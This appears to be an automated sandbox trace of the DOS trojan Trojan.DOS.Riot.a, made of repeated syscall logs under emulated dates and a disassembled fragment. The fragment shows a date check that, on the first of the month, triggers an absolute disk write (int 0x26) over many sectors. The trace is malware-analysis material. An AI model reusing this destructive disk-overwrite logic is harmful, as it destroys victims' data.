Sample viewer

vx.netlux.org/Trojan.DOS.Riot.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:14:32.504959829Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-17T22:14:32.506568455Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-17T22:14:32.507269022Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:14:32.508407652Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:14:32.510452918Z 26 PC: 12a7d | Set disk transfer address
2018-12-17T22:14:32.511558066Z 59 PC: 12a9f | Change current directory
2018-12-17T22:14:32.515659959Z 87 PC: 12aa6 | Get or set file date and time
2018-12-17T22:14:32.520811969Z 62 PC: 12aaa | Close file
2018-12-17T22:14:32.522647016Z 42 PC: 12ab3 | Get date
0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21
2018-12-17T22:14:32.525093157Z 67 PC: 12ae2 | Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2734,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:20.908405546Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T11:46:20.911431478Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T11:46:20.912576424Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:46:20.914136365Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:46:20.916164426Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T11:46:20.917636036Z 59 PC: 12a9f | Change current directory
2018-12-25T11:46:20.922290629Z 87 PC: 12aa6 | Get or set file date and time
2018-12-25T11:46:20.924327285Z 62 PC: 12aaa | Close file
2018-12-25T11:46:20.926036986Z 42 PC: 12ab3 | Get date
0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2734,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:47.990458292Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T13:06:48.000288349Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T13:06:48.001268907Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:06:48.002646252Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:06:48.0113104Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T13:06:48.013556699Z 59 PC: 12a9f | Change current directory
2018-12-25T13:06:48.018933395Z 87 PC: 12aa6 | Get or set file date and time
2018-12-25T13:06:48.021303704Z 62 PC: 12aaa | Close file
2018-12-25T13:06:48.023290965Z 42 PC: 12ab3 | Get date
0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21
2018-12-25T13:06:48.026125547Z 67 PC: 12ae2 | Get or set file attributes